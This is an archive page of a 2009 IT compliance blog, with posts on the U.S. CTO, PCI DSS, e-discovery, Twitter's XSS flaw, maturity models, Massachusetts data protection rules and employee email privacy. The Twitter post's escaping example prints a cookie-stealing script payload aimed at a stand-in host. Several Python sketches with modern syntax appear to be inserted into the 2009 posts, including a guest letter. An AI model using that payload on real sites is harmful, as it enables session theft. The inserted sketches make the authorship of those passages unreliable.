IT Compliance Advisor


September 9, 2009  5:50 PM

U.S. CTO Chopra on transparency and governing by outcomes at Gov 2.0

Profile: Guy Pardon

Aneesh Chopra is in a unique position. As the first chief technology officer (CTO) for the United States, he’s defining the role as he goes. During an interview with tech publisher Tim O’Reilly at the Government 2.0 Summit in Washington, D.C., the U.S. CTO provided more perspective on what he does and what citizens and businesses alike might expect from the current administration.

The role of the U.S. CTO

Chopra describes himself as an assistant to the president, where he focuses on providing advice on technology policy. In his words, “my role is to bring tech innovation and advocate for policy,” where his “unit of output” is policy recommendations.

Chopra offered the example of hearing in Silicon Valley that “some of our public policies weren’t market-oriented or innovative.” In response, he convened a roundtable to rethink that approach. O’Reilly commented that it sounded like the role of the U.S. CTO was “a lot like a diplomat or ambassador.” Chopra says he’s a convener, pulling together officials across the government to address needs and using digital tools to gather feedback from citizens and businesses.

O’Reilly asked about his relationship with Vivek Kundra, the U.S. CIO. The dynamic between CIO and CTO is a point of interest in most large enterprises — the federal government brings that to a new level.

Chopra pointed to Kundra’s influence on procurement. “If we have influence on standards, research and development (with $150 billion in R&D spend), the third lever is procurement.” As Chopra observed, spending billions on technology has an effect on market outcomes; he cited $76 billion spent on IT alone.

Transparency

One of the buzzwords in the new administration has been transparency. Chopra stated that “there should be accountability for each agency” and that “every agency will be directed to publish their open government plans” in response to the president’s open government directive. Chopra says that “there should be a structured approach that is not tied to any particular White House.”

Governing by outcomes

O’Reilly pushed Chopra to look beyond social media or transparency, however, and consider “the bones of the government operating system,” citing the role that the federal government has already played in location technologies and the Internet backbone itself. Chopra said policy priorities include securing and improving the energy grid and cybersecurity. He said he sees “potential in government as a platform” but was clear “we will make investments based upon whether the platform will be utilized.”

He offered as examples the systems of incentives for physicians and electronic health record conversion, where healthcare entities “will get an incentive payment if they can demonstrate they are using the technology in a meaningful way.”

Chopra provided an example of how healthcare IT is being applied, explaining that research data is being gathered from “every single veteran who receives a procedure in a cath lab” in a veterans’ administration hospital. “Less than 10 minutes later, the physician gets a handheld device to draw what he did in each of the 70 VA hospitals. That’s then sent to a database at the American Institute of Cardiology.” Chopra says such data is protected under appropriate privacy and anonymity provisions. “That database probably submits the lion’s share of the digital data that can be mined by cardiologists,” says Chopra.

Preparing for “business” continuity

Chopra also focused on education and the upcoming flu season, reflecting the concerns of the CIO of the CDC about swine flu. “We’ve invested heavily in digital learning,” said Chopra. “There’s now a healthy debate — especially in light of H1N1 concerns — about what would happen if a school had to close for two or three weeks.” He referred to the H1N1 “Continuity of Learning” memo issued by HHS and the Secretary of Education, Arne Duncan. Providing virtual means for students and teachers to continue education efforts in the event of a healthcare disaster is clearly in play.

In other words, the U.S. CTO is worried about disaster recovery, getting the most from technology investments and remaining accountable to customers and clients — not so different from the role of the classic enterprise CTO at all.


September 3, 2009  8:16 PM

Evaluating the cybersecurity plan and the role of a federal CISO

Profile: Guy Pardon

In this episode of the IT Compliance Advisor, Associate Editor Alexander B. Howard interviews Patricia Titus about the Obama Administration’s cybersecurity plan, the creation of a federal CISO and where policy might move in the coming months. Titus was formerly chief information security officer at the Transportation Security Administration within the U.S. Department of Homeland Security.

When you listen to the podcast, you’ll hear Titus’ views on:

  • What’s new in the cybersecurity plan?
  • Why is it taking a while to name a cybersecurity coordinator?
  • Where is the U.S. CISO?
  • What would be the top challenges of a U.S. CISO, should one be appointed?
  • What are the elemental needs for implementing cybersecurity across government agencies?
  • How do the Rockefeller-Snowe Bill (S.773) and ICE Act fit into cybersecurity strategy?
  • What would ramping up the nation’s offensive capabilities in cyberwar mean?
  • What do compliance officers and CISOs need to think about this fall?

Note: Our colleague Mike Mimoso also interviewed Titus about the Obama cybersecurity plan in June for Security Wire Weekly, when the strategy was first released. The episode also features security luminary Howard Schmidt and Paul Kocher, chief scientist of Cryptography Research.



September 1, 2009  4:57 PM

Anton Chuvakin on PCI DSS compliance, security and nonprofits

Profile: Guy Pardon

When it comes to meeting the requirements of the Payment Card Industry Data Security Standard (PCI DSS), the mantra of the moment is compliance, not security. Anton Chuvakin, a well-known expert on PCI DSS compliance, has a number of recommendations for nonprofits in this podcast. Simply put, trust matters more when your relationship with donors is at risk.

When you listen to the interview, recorded with SearchCompliance.com Associate Editor Alexander B. Howard, you’ll hear more about how to minimize risk, the wisdom of outsourcing and why you should focus on the core mission of the nonprofit, not software development.



August 28, 2009  5:01 PM

Email to the editor: ‘Data security: The missing piece of e-discovery’

Profile: Guy Pardon

The post below is an email to the editor received from Robert DeFazio of Calabria Consulting, responding to “Data security: The missing piece of e-discovery” by Paul Roberts. The views expressed are those of Mr. DeFazio, not this publication or its editors. Comments on its content are welcome.

In an infamous commercial in the 1970s, the actor Chad Everett, who played a handsome doctor on the television series Emergency Room, said, “I’m not a doctor, but I play one on TV.” I’m not an attorney, but I have read a lot about the practice of law and how it addresses computers and electronic evidence.

Part of what I do is to provide suggestions as to how data needs to be kept to mitigate the costs of e-discovery. What I have found is that IT department heads, enabled by the very business owners who would suffer the most in litigation, often feel comfortable dismissing the idea that lawyers properly belong in the loop when it comes to making decisions about how data is stored. Instead, they point to conventional “best practices” that represent the path of least blame should something ever go awry.

The harsh realities of litigation should strike fear into the hearts of every CTO and CIO. Why? The requirements for the admissibility of evidence in court regarding electronic documents focus largely on how hearsay evidence is treated.

In some jurisdictions and courts, the Federal Rules of Evidence and Federal Rules for Civil Procedures are disregarded when it comes to electronic documents because, quite frankly, the judges and attorneys involved simply don’t understand the nature of digital data. They have no idea of what metadata is and why it is important. They don’t seem to understand why the concept of presumption, which is used so often in other areas of legal theory, is often inappropriate when it comes to the authentication of electronic documents. They seem not to understand that electronic documents in native file formats can be manipulated easily. They naïvely trust that anything that comes from a computer is accurate and not hearsay because it’s not produced with a “touch from human hands.”

In other courts, they pay attention to the rules of evidence. They want software that purports to offer factual evidence itself to be authenticated. They want real proof that a document is an original copy or that the copy offered can be shown to meet tests that demonstrate it matches, byte for byte, a reference copy that has an unbroken chain of custody. They want to see that there are specific written policies and procedures that would reasonably assure that a stored document would not be altered during its archival. They want to see things like digital signatures, asymmetric encryption key pairs being used to secure documents, and a host of other up-to-date practices that courts in other countries regard as the ONLY measures that assure the authenticity of documents.
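The byte-for-byte test DeFazio describes is, in practice, usually done with cryptographic hashes: record a digest when the reference copy enters the chain of custody, then compare later copies against it. Here is a minimal sketch in Python; the function names are my own illustration, not drawn from any e-discovery product:

```python
import hashlib

def sha256_of(path: str, chunk_size: int = 65536) -> str:
    """Return the SHA-256 digest of a file, read in chunks so that
    large archives don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def matches_reference(candidate_path: str, reference_digest: str) -> bool:
    """True only if the candidate file matches, byte for byte, the digest
    recorded for the reference copy when it entered custody."""
    return sha256_of(candidate_path) == reference_digest
```

Any later alteration to the file, even a single byte, changes the digest and makes the comparison fail, which is exactly the property a court needs to see demonstrated.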

This means that data security must be viewed from a different perspective than the prevailing notion of best practices. Not only does data need to be retained for operational efficiency in the event of a data disaster, but it must also be managed along a separate pathway in such a way that it will meet the needs of attorneys who must defend the corporate endeavor in the event of litigation. Data needs to be cataloged at the time it is stored in accordance with its likely future legal use. Archived data needs to be kept in two different ways: one for purposes of disaster recovery and the other for legal purposes.

Moreover, the legal archives should not be regarded as a form of “backup data.” They should be regarded as comprising a database in their own right, requiring their own disaster recovery backups.
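The dual-pathway idea can be sketched as a catalog record written at storage time, routing every document to the disaster-recovery archive and legally relevant documents down a separate legal pathway as well. The schema below is purely illustrative; real records-management systems define their own field sets:

```python
from dataclasses import dataclass

@dataclass
class ArchiveRecord:
    """Catalog entry written when a document is stored.
    Field names are illustrative, not a standard schema."""
    document_id: str
    stored_at: str        # ISO timestamp of storage
    custodian: str        # who controls the document
    legal_category: str   # e.g. "contract", "correspondence"; "" if none
    retention_years: int
    legal_hold: bool = False  # set when litigation is anticipated

def route_to_archives(record: ArchiveRecord) -> list[str]:
    """Every document goes to the DR archive; documents with a legal
    category are also copied to the separate legal archive."""
    destinations = ["disaster_recovery"]
    if record.legal_category:
        destinations.append("legal_archive")
    return destinations
```

A record like this, written once at storage time, is what lets attorneys later identify responsive documents without reconstructing them from operational backups.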

Why? E-discovery is very expensive. In most states, it is the respondent to a demand for documents that must pay for discovery costs, not the requesting party. E-mail, backup tapes, instant messages, word processing documents, cached files from Web browsers, deleted and fragmented files, network logs, databases, event logs, contents of PDAs and cell phones, and entire disk drives from on-site servers, workstations, home computers, contractors’ computers, and much more is what is typically sought in the process of e-discovery. Litigation holds can be placed on parties even if they are not directly involved in the lawsuit. These parties then cannot add, delete or modify the contents of disk drives or other equipment, not only during the discovery process but perhaps even until the litigation is finished and has gone through all appeals.

Just how expensive e-discovery can be is illustrated by specific cases and by the assumptions the legal profession has made about a reasonable range of e-discovery costs. In the 2002 case of Rowe Entm’t v. William Morris Agency, e-discovery costs exceeded $10.9 million before the first day of trial. In patent litigation, the costs commonly run between $4 million and $5 million, most of that being e-discovery. Many attorneys now accept that e-discovery costs for litigation involving a small to medium-size company would range between $2 million and $3.5 million.

E-discovery is now a multibillion dollar industry. Sharks go where there is blood. Litigation support industries spring up around the areas of litigation where there is the most confusion, with respect to evidence, and the highest likelihood of maximum billable hours. When companies keep data here, there and everywhere in ways that make sense to a tech employee whose job it is to keep the machinery of the company moving, it will require an incredible amount of time and work to reconstruct data and documents for purposes of pursuing litigation in court. A tech employee wouldn’t usually understand this, but the company’s attorney would or should. The company’s attorneys need to be part of the group of decision makers when it comes to establishing data storage requirements.

“Anathema!” you say? Get used to it, or eventually go out of business. Litigation is often not so much the pursuit of justice as it is the exercise of legal intimidation. By escalating the demands for electronic documents in the pretrial stages, the costs to be borne by a respondent can rapidly become more than the amount the party intended to recover by going to court in the first place, forcing settlement instead of resolution. Managing data so that it is easy to identify from a legal perspective may not make sense at the moment, but as soon as a suit is filed that seeks damages in the amount of $50 million, the cost of maintaining parallel archives (disaster vs. legal) would seem like a drop in the bucket.

I am sure that someone who reads this might conclude that keeping electronic data in this way is just about as expensive as keeping everything on paper. To that, I respond, “You might be right.” The American mind-set always wants proof that this or that is true. If you have the original stone tablet, you can compare the chisel marks to samples of other stone tablets made by the same person to authenticate it. A stone tablet or a piece of paper represents a finished work, where further modification has ceased. The ephemeral nature of electronic data, however, erodes nearly all the traditionally understood landmarks of evidence trustworthiness. The bar is, therefore, set much higher when it comes to the admissibility and weight afforded to electronic evidence. In some cases, a man’s freedom might be at stake because of a decision about the authenticity of an e-mail message. In another case, the survival of an entire corporation and all the jobs and income it produces might hang on the wording of a single sentence in a 200-page document where the opposing parties offer copies that differ by a single word.

Data processing costs have been traditionally viewed as being economical because the cost of litigation was never folded into the mix of expenses of running a data-centric business. E-mail, instant messages, electronic documents, databases … all these things make the operation of business much easier to achieve. They also make the defense of a business much more expensive to conduct when things go wrong.

The cost of running an IT department includes:

  • high levels of security
  • backup procedures for purposes of disaster recovery
  • archives where the documents must be individually cataloged for future legal use
  • backups of legal-oriented archives
  • indexing legal documents using OLAP approaches
  • retrieval of documents during litigation
  • maintaining both on-site and one or more off-site storage facilities

That’s a much bigger number than one that just takes into consideration running some servers and workstations and making daily backup tapes. It is that number that needs to be stacked up against the cost of doing things on paper.
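As a toy illustration of how much larger that number gets, the following sketch totals the categories listed above. Every dollar figure is invented for illustration; the point is only that the full program dwarfs the "servers and backup tapes" budget:

```python
# Toy comparison of a "just run the servers" budget vs. the full cost
# list above. All figures are hypothetical; substitute your own numbers.
basic_ops = {
    "servers_and_workstations": 400_000,
    "daily_backup_tapes": 50_000,
}

full_program = dict(basic_ops, **{
    "security_controls": 250_000,
    "dr_backup_procedures": 120_000,
    "legal_archive_cataloging": 180_000,
    "legal_archive_backups": 60_000,
    "olap_indexing": 90_000,
    "litigation_retrieval": 75_000,
    "offsite_storage": 110_000,
})

print("Basic operations:", sum(basic_ops.values()))
print("Full program:    ", sum(full_program.values()))
```

It is the second total, not the first, that belongs in a comparison against the cost of doing things on paper.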


August 28, 2009  1:46 PM

Information technology: Key enabler to a sustainability strategy

Profile: Scot Petersen

Adam Werbach is Global CEO of Saatchi & Saatchi S, a sustainability agency, and author of a new book, Strategy for Sustainability. Werbach writes that, “sustainability initiative(s) must be core to the business—bold, not bolted on.” In this email interview, he expands on IT’s role as a primary driver for sustainable business, and adds that, despite voluntary initiatives, “eventually, all businesses will be regulated into compliance.”

Is information technology, including the people, hardware, software and processes, going to be the primary driver for developing sustainable business practices, or one of many tools toward that end?

Adam Werbach: IT is a critical enabler to a more sustainable enterprise. The first characteristic of a sustainable business is that it’s transparent. Transparency means getting salient metrics widely spread into the organization. The IT function can play an essential role in this sort of transparency. There are also direct benefits in energy savings, telecommuting, and logistics efficiency support that IT can aid.

What is the best role for IT in a sustainability strategy?

AW: Convener. Building a sustainable organization requires the creation of a cross-functional network, where non-traditional authority can solve systemic problems. Since IT crosses all divisions, it sits in a perfect location to bring groups together for design charrettes.

Do you envision sustainability managers being able to “model” capital expenditures around sustainability in the same way the finance department develops net present value models for everything else? In other words, will companies be able to determine ROS (return on sustainability) for sustainable initiatives?

AW: Absolutely. In most cases, sustainability investments will simply be blended into existing capital programs. Some companies have lowered the hurdle rate for investments connected to clean energy, for example, as a means of hedging against future energy price spikes or for the public relations value of the investment. In this case, the bar is lowered because of broader corporate benefits.

Will such ROS calculations be built only around cost savings or can sustainable practices actually make money for a company?

AW: The best topline opportunities right now exist in the expansion of a product to a new consumer (or B2B) customer base. There are an exceedingly large number of companies and consumers adding sustainability as a primary or secondary buying attribute. Eventually, all businesses will be regulated into compliance, but right now the companies leading the pack are gaining new customers.


August 26, 2009  3:15 PM

Twitter security hole highlights need for a social media policy today

Profile: Guy Pardon

Once again, Twitter security is in the headlines. Yesterday, SEO expert Dave Naylor posted that James Slater had found a cross-site scripting vulnerability in Twitter. Cross-site scripting (XSS) is a common – and nasty – security exploit that allows a malicious hacker to insert JavaScript code into links that a user believes are trustworthy. Instead of sending a user to a given website, that script would then execute, which could allow any number of ugly outcomes, including worms, malware infections or harvesting of session cookies.
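The standard defense against XSS is to escape untrusted input before rendering it into a page, so that injected script arrives as inert text. Here is a minimal sketch using Python’s standard library; it illustrates the general technique, not Twitter’s actual fix:

```python
import html

def render_comment(user_input: str) -> str:
    """Escape untrusted text before embedding it in HTML, so any
    injected <script> is displayed rather than executed."""
    return "<p>{}</p>".format(html.escape(user_input, quote=True))

# A typical cookie-stealing payload of the kind XSS attacks inject:
malicious = '<script>location="http://evil.example/?c="+document.cookie</script>'
print(render_comment(malicious))
# The < > and " characters come out as &lt; &gt; &quot;, so the browser
# shows the payload as text instead of running it.
```

Frameworks that escape by default close off this whole class of attack; the Twitter hole shows what happens when one rendering path skips that step.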

While no apparent damage to privacy or sensitive data has occurred through this XSS exploit, the lesson from the past 24 hours is that a social media usage policy needs to be drafted, promulgated and enforced ASAP.

Although Ben Parr wrote on the social media blog Mashable that the Twitter exploit had been fixed, echoing Twitter staff comments, Naylor followed up today with evidence that the exploit still works – just visit @APIfail2 for a (harmless) example. You’ll need to view the account in a Web browser, since third-party clients are not affected by the issue.

TechCrunch has picked up the lack of resolution to the Twitter security issue. Robin Wauters, the author of the post, has sought further comment from the startup. Although the security team at the online social messaging startup is no doubt working overtime to address the issue in a more substantive way, this episode only adds fresh concerns about the Twitter security risks I reported on in June. Twitter may need to hire a CISO soon.

Such online security concerns, however, aren’t limited to Twitter. If anything, Facebook is an even bigger target, both because of its size and the likelihood of more personal information in profiles. That reality hasn’t gone unnoticed by hackers, as rogue Facebook phishing applications popped up last week.


What does all this mean for the compliance and security community? It’s time to get serious about addressing the risk by drafting a social media policy that uses available DLP technology, sets expectations for online privacy and, perhaps most importantly, includes user education about Web app security, social engineering and phishing. As I reported earlier this month in a story exploring social media and compliance, “fewer than one-third of respondents in a recent survey said their organization had a policy in place governing social media use” – and “only 10% of the companies surveyed indicated that they had conducted employee training on such use.”

According to another survey, from security firm AVG, only 27% of social networking users are taking steps to protect themselves against similar online threats. According to “Bringing Social Security to the Online Community,” conducted with the CMO Council, 20% of social networking users have been the victims of identity theft, 55% have experienced a phishing attack, and 47% said they’ve had to deal with malware. Stark numbers.

In other words, if social media security wasn’t on your task list already, it should be now.



August 25, 2009  5:29 PM

Capability and Maturity Model Creation in Information Security

Profile: Guy Pardon

This is a guest post from Secure Payments and Chaordic Design Evangelist Michael Dahn. He blogs frequently about PCI and information security at ChaordicMind.com. Contact him there or follow @sfoak on Twitter.

One of the problems that many companies face is staying ahead of the information security curve. Go too fast and you run the risk of wasting capital; go too slow and you run the risk of being compromised. So how can a company escape the hamster wheel of pain? By being proactive in managing risk and implementing a maturity framework for the organization.


In an attempt to balance the two domains of cost and security, a continual tradeoff, many companies have implemented regulatory compliance standards. These are good tools for measuring one’s security against a known industry baseline. The classic example is the Payment Card Industry Data Security Standard (PCI DSS). Using standards like PCI DSS, companies can measure their adherence to eliminating sensitive data and protecting the remaining in-scope systems.

There are two problems with aligning an entire information security model along any singular guideline. It should be noted that, in the absence of any information security program, PCI DSS is a very good baseline standard.

The first challenge is the 0-to-100 problem. Some companies start with no information security program and try to adhere to something like PCI DSS. Much like measuring the acceleration of a car by how fast it can go from 0 to 100 miles per hour, these companies struggle with getting from 0 to 100 percent compliance in under 12 months. For these companies this means implementing security for the sake of a deadline, which means not always having the time to test what works and what does not.

The second challenge is the security limiter problem. Once companies reach 100 percent adherence to a given standard, many times they stop developing their information security program. These companies then enter a vicious cycle of identification and remediation. Each year, their auditors alert them to a new set of issues and, each year, the companies fix those and then relax until the following year.

So how do we escape this endless cycle of identification and remediation? How do we provide a way for companies to go from 0 mph to 50 mph in year one, 50 to 100 in year two, and still be inspired to go from 100 to 150 in year three? How do we become proactive instead of being reactive? One option for addressing these problems is the capability maturity model (CMM) that involves risk management.

A CMM is nothing new or innovative. It’s a useful approach for managing the maturity in a system. The Computer Security Handbook 4th Edition reveals that CMMs originated from software development. This book states that a CMM “can be used as a way to assess the soundness of a security product builder’s engineering practices during the many stages of product development.” If a CMM can be used for measuring the soundness of engineering practices, then why not leverage it to measure the soundness of information security practices?

A maturity model encourages continual growth rather than strict adherence to Procrustean boxes of information security. It’s the mathematical equivalent of the integral or the continual variable transmission of an automobile. It provides a smooth curve instead of designated endpoints of information security. For companies suffering from the 0-to-100 problem, a maturity model enables growth from 0-to-50 initially, with the projection of moving from 50-to-100 at a later date. Companies that suffer from the security limiter problem have the ability to continuously and proactively plan information security development to parallel growing business needs, instead of an independent set of criteria.

The Information Security Management Maturity Model (ISM3, or ISM-cubed) provides us with the intersection of information security and a maturity model for growing an information security program. ISM3 describes the process this way:

“Rather than focusing on controls, it focuses on the common processes of information security, which are shared to some extent by all organizations.

Under ISM3, the common processes of information security are formally described, given performance targets and metrics, and used to build a quality assured process framework. Performance targets are unique to each implementation and depend upon business requirements and resources available. Altogether, the performance targets for security become the Information Security Policy. The emphasis on the practical and the measurable is what makes ISM3 unusual, and the approach ensures that ISM systems adapt without re-engineering in the face of changes to technology and risk.”

In fact, the ISM3 is based in part on extending the Systems Security Engineering Capability Maturity Model (SSE-CMM), which is ISO standard 21827. The SSE-CMM “describes the essential characteristics of an organization’s security engineering process that must exist to ensure good security engineering.”

In addition, consider the Building Security In Maturity Model (BSIMM), which is “designed to help you understand and plan a software security initiative.” There is also the Open Software Assurance Maturity Model (OpenSAMM) project, which can “help organizations formulate and implement a strategy for software security that is tailored to the specific risks facing the organization.” These frameworks exist as tools for helping develop the maturity of organizations and software through the use of measured metrics.

And metrics is where all the magic really happens. Only by measuring the maturity of an organization and matching it to the development and progress of known attacks can we demonstrate that we are maintaining the balance between costs and security. There is a saying that if you and your friend are being chased by a bear, you don’t need to outrun the bear — you need only outrun your friend. In the world of ever-increasing compromises, many companies struggle to stay ahead of the curve. A maturity model, with proper metrics, can help your organization do just that. The best part? Companies that implement a maturity model and show measured growth are many times more likely to adhere to industry standards such as the PCI DSS.
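The kind of measurement described above can be sketched as maturity scores, CMM-style levels from 0 to 5, recorded per security process per assessment year. The processes and scores below are invented purely for illustration:

```python
# Hypothetical maturity assessments: level 0-5 per security process.
assessments = {
    2008: {"patch_mgmt": 1, "log_review": 0, "incident_response": 1},
    2009: {"patch_mgmt": 3, "log_review": 2, "incident_response": 2},
}

def overall_maturity(scores: dict[str, int]) -> float:
    """Average maturity across processes -- one coarse metric of the
    smooth growth curve a maturity model aims for."""
    return sum(scores.values()) / len(scores)

growth = overall_maturity(assessments[2009]) - overall_maturity(assessments[2008])
print(f"Year-over-year maturity growth: {growth:+.2f} levels")
```

Even a metric this simple turns "are we improving?" into a number that can be reported year over year, which is the proactive posture the model is meant to encourage.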



August 21, 2009  4:10 PM

Clarifying mobile encryption requirements for 201 CMR 17.00 compliance

Profile: Guy Pardon

When I reported on amendments to the Massachusetts data protection law earlier this week, one of the comments that undersecretary of consumer affairs Barbara Anthony made was a point of interest to many enterprise IT professionals who must determine what 201 CMR 17.00 compliance will mean.

Specifically, Anthony stated that, “We know right now that there’s no widespread technology for encrypting mobile devices, but we know it’s there for laptops.”


Given that the regulation’s language includes a requirement for encryption where “technically feasible,” the issue demanded clarification. I contacted Secretariat CIO Gerry Young, who was involved in drafting the original regulation. He offered the following guidance on mobile encryption:

“This just belies unfamiliarity with the current state of encryption. Even a cursory scan will show that technologies like Snapcell, Navastream, AlertBoot, SecurStar PhoneCrypt, Endoacustica and Babylon nG have carried cell phone encryption to fairly sophisticated stages.

“Encryption for cellular phones has evolved beyond even enterprise-class smartphones, and you are beginning to see robust offerings for 3G phones available at attractive price points.

“European companies like Navastream (Germany) are making inroads in U.S. markets to fill a clear void. This will help to drive competition, and push price points lower for the consumer.

“I would think that once there are free, open source encryption alternatives — along with a plethora of low-cost encryption vendors in the cellular market — that we would be ready to mandate cell phone encryption in the near future.”

In other words, encrypting mobile devices and smartphones remains a best practice, particularly where resident PII is present, but is not mandated for 201 CMR 17.00 compliance — yet.



August 20, 2009  6:09 PM

Amended Massachusetts data protection act focuses on risk management

Profile: Sarah Cortes

As Alexander Howard reported earlier today, the Massachusetts data protection law has been amended. The revised data privacy regulations — 201 CMR 17.00, “Standards for the Protection of Personal Information of Residents of the Commonwealth” — include several key updates. If you are an information security professional, take note of these changes, as they will likely have practical implications.

The most immediate impact is the provision for an additional 60 days to comply with the regulations. The deadline for implementation is now March 1, 2010.

Individuals and municipalities have expressly been removed from guideline jurisdiction, with a clarification that the “regulation applies to those engaged in commerce.” Guidelines on the requirement for a written information security plan are now simplified.

A new definition for the term service provider was added. The Office of Consumer Affairs and Business Regulation also amended third-party vendor rules. There is now a two-year grace period, relative to existing contracts, and requirements for those third parties to be in compliance.

Encryption requirements have been clarified. The apparently strict but, practically speaking, vague 128-bit specification from the prior version was replaced by “technology-neutral language.”

Further, a “technical feasibility” standard has been incorporated, acknowledging that methods to securely encrypt data on portable devices may not yet be available. Email encryption now falls under the technical feasibility standard. Additionally, encryption of backup tapes has been clarified to include prospective encryption. So you may safely cancel your firm’s plans to encrypt existing backup tapes. Encrypting new backup tapes will still be required, along with any personal data that travels over the public Internet or wireless network.

In another change that I believe will ultimately enhance consumer protection, 201 CMR 17.00 has been brought in line with certain federal regulations. Specifically, the Massachusetts data protection act now cedes authority to the Federal Trade Commission's (FTC) standards established under the Gramm-Leach-Bliley Act (GLBA). GLBA utilizes a risk management approach to data security.

The patchwork of 44 different state health data protection laws has delayed electronic automation of, and therefore overall security for, health records. Adopting a federal standard, starting with the FTC’s risk-based approach to data protection, avoids this pitfall and may make widespread compliance both more feasible and more likely in the near future.

On one hand, a risk management approach should be familiar to IT professionals. It shifts resources from “check-the-box” controls that may or may not address a particular organization’s specific risks to controls that make more sense in context. On the other hand, given the concrete definition of the personal information in scope, it is difficult to see where risk management would not be present whenever such personal data is stored.
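The risk-based approach can be caricatured in a few lines of code: score a business's actual exposure, then require only the controls that match it. This is purely illustrative; the factor names, weights, and thresholds below are invented for the example and appear nowhere in the regulation.

```python
def risk_score(records_held: int, portable_storage: bool,
               third_party_sharing: bool) -> int:
    """Toy exposure score for a business holding personal data.
    Weights are hypothetical, chosen only to show the mechanism."""
    score = 0
    if records_held > 1000:
        score += 2          # volume of personal records
    if portable_storage:
        score += 2          # laptops and tapes leave the premises
    if third_party_sharing:
        score += 1          # vendors widen the attack surface
    return score

def required_controls(score: int) -> list:
    """Map a risk score to a (hypothetical) set of required controls."""
    controls = ["written information security plan"]  # always required
    if score >= 2:
        controls.append("encryption of portable devices")
    if score >= 4:
        controls.append("vendor compliance certification")
    return controls
```

A small retailer with no laptops and no vendors would land on the baseline plan alone, while a firm with thousands of records on portable media would pick up the heavier controls, which is the matching of investment to risk that the quote below argues for.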

“Mandating every component of a program and requiring its adoption, regardless of size and the nature of the business and the amount of information that requires security, makes little sense in terms of consumer protection,” said Bradley MacDougall, of Associated Industries of Massachusetts. Risk management and assessment will afford more consumer protection by matching a given business’ actual risks with required security investments.



August 19, 2009  9:03 PM

The impact of Stengart v. Loving Care on employee online privacy

GuyPardon Guy Pardon Profile: GuyPardon

This is a guest post from SearchCompliance.com contributor Andrew M. Baer, Esq. You can follow him at @baerbizlaw on Twitter.

The Stengart v. Loving Care case that Alexander Howard wrote about in "The Web of social media and compliance: The ECPA and online privacy" is a very interesting one and merits closer examination. In that case, a New Jersey appellate court held that an employee did not waive her attorney-client privilege in communications with her lawyer that she sent through her personal Yahoo email account using a work computer, despite the employer's attempts to argue that its electronic communications policy made the emails its property.

While the court’s opinion contains some lofty language about how an employer’s right to regulate its workplace is not limitless, the case actually turned on several key facts. Therefore, like the Pietrylo case discussed in my article on employee social media use policy, it can be seen as a case study in botched compliance.

The first half of the opinion deals with questions about the following:

  • Whether the electronic communications policy was even in force and applied to the plaintiff.
  • Whether it was disseminated and the plaintiff had notice of it.
  • Which version (of several) was the applicable one.
  • How the policy was to be interpreted in light of its rather shoddy drafting and contradictory statements regarding the allowance of personal communications.

The appellate court found that the lower court had not conducted a proper evidentiary inquiry concerning these issues. In particular, how a policy is drafted and how it should objectively be interpreted has a huge impact on what sort of online privacy expectations it is reasonable for an employee to have. The court also specifically noted that the employer had not followed the customary practice of obtaining from its employees a signed acknowledgment of the policy.

The policy also took the position that communications made using work computers became the "property" of the employer, which clearly rubbed the court the wrong way. To sum up, the policy might not have been so offensive to the court if it had:

  1. Been limited to specifying a right to monitor;
  2. Linked this right to a clear, unambiguous and customary set of prohibitions regarding personal communications; and
  3. Been consented to in writing by the plaintiff.

Last but not least, the lofty statements about privacy in the workplace that I referred to earlier carry little weight as precedent. As the court itself admitted, the real issue in the case was not defining the scope of the restrictions on an employer's ability to access personal employee communications made using corporate IT resources. Instead, it was whether the plaintiff, in the particular facts and circumstances of the case, should lose her attorney-client privilege in certain emails.

The attorney-client privilege is sacred, particularly in New Jersey, as I know from past experience there. Courts will strain to avoid finding that a waiver has occurred, except in situations where a litigant behaves as if it doesn’t care whether its communications with an attorney are intercepted or not. In Stengart, the court effectively concluded that, despite the electronic communications policy, the plaintiff had not exhibited that level of indifference. The defendant’s law firm also seems to have behaved badly by reading the attorney-client emails and not alerting the plaintiff’s counsel that it had possession of these emails.

So, a small victory for employee online privacy at best, but one that contains important lessons for corporate compliance officers and counsel.


